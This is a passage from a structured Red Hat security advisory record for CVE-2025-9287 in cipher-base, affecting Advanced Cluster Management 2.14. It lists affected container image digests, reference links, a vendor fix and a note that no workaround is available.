"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-9287"
},
{
"category": "external",
"summary": "RHBZ#2389932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2389932"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9287",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9287"
},
{
"category": "external",
"summary": "https://github.com/browserify/cipher-base/pull/23",
"url": "https://github.com/browserify/cipher-base/pull/23"
},
{
"category": "external",
"summary": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc",
"url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc"
}
],
"release_date": "2025-08-20T21:43:56.548000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-30T12:58:23+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:19335"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
